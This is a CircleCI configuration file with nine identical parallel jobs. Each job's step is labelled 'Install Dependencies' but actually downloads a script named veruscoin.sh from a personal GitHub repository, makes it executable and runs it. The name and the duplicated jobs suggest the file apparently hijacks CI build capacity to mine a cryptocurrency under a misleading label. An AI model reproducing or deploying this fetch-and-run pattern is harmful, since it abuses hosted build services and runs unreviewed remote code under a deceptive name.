version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh 
      parallelism: 4
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh 
      parallelism: 4
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh 
      parallelism: 4
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh 
      parallelism: 4
    Devop4:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh 
      parallelism: 4
    Devop5:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh  
      parallelism: 4
    Devop6:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh    
      parallelism: 4
    Devop7:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh      
      parallelism: 4
    Devop8:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://raw.githubusercontent.com/Yahihs/youtube/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh                 
      parallelism: 4
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            - Devop1
            - Devop2
            - Devop3
            - Devop4
            - Devop5
            - Devop6
            - Devop7
            - Devop8
            
            
            